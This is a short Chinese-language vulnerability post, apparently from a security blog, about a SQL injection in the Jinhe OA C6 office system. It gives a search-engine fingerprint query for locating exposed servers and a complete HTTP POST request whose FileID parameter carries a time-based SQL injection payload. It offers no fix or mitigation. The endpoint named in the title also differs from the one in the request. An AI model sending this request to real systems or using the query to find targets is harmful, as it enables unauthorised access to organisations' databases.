Babing
Published on 2024-08-30 / 14 Visits
0
0

金和OA-C6-UploadFileEditorSave SQL注入

#OA

0x01 漏洞名称

金和OA-C6-UploadFileEditorSave SQL注入

0x02 漏洞介绍

用金和OA-C6-UploadFileEditorSave.aspx接口存在SQL注入漏洞,攻击者可以通过此接口执行sql命令。

0x03 影响范围

金和OA

0x04 网络空间测绘查询

body="c6/Jhsoft.Web.login"

0x05 漏洞复现

POST /C6/Control/UploadFileEditor.aspx HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate


FileID=1';WAITFOR+DELAY'0:0:8'--+

image-mxvb.png


Comment